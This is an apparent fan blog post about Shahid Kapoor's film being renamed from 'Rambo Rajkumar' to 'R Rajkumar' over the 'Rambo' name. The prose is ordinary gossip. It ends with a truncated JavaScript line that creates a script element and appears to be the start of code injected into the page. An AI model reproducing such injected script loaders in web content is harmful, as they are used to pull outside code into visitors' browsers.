Where did the Rambo go from R Rajkumar?

Shahid Kapoor is one hot guy and like every other hottie in Bollywood he’d his fair share of hits and misses. This year he appeared in Bombay Talkies and then in Phata Poster Nikla Hero. We fans were a tad bit disappointed after watching the movie but didn’t take the absurdity of Phata Poster Nikla Hero to our heart.

Why? Because we have bigger fish to fry. We are all eagerly waiting for the release of R Rajkumar and cannot wait to see Shahid Kapoor in a very comic-action romantic hero avatar. His character has everything. If we had a check list, he’d fit the criteria perfectly! But never mind all that. What’s more important is what happened to the title of his movie? I mean as far as I remember it was Rambo Rajkumar. Right?

We all kept gushing about his look in Rambo Rajkumar, his antics in Rambo Rajkumar, him romancing Sonakshi Sinha in Rambo Rajkumar and finally about him kicking some ass in Rambo Rajkumar. And then, just like that, the makers of the movie unanimously decided to change the title. From Rambo Rajkumar to R Rajkumar. Who does that? Well Sanjay Leela Bhansali did it for Ram Leela but that’s a different story.

We were all very intrigued and very interested to know the real reason behind the name change. It doesn’t happen everyday now, does it? So, apparently what happened was, the makers of R Rajkumar or rather Rambo Rajkumar weren’t very vigilant. They were foolish enough to think that the name Rambo would be freely available and they could use it left, right and center!

Hello! Don’t you guys remember Sylvester Stallone’s Rambo? The movie or rather the series was a HUGE hit! The makers of Rambo must’ve gotten the name copyrighted obviously! Didn’t it ever occur to you? Like you guys didn’t learn anything from Shahrukh Khan’s Kal Ho Na Ho and the song Pretty Woman? Hmmm!

Watch and learn guys! We are all eagerly waiting for R Rajkumar to release this weekend. We don’t want any delays! We can’t take it. We aren’t as patient as the Sherlock fandom. var d=document;var s=d.createElement(‘script’);
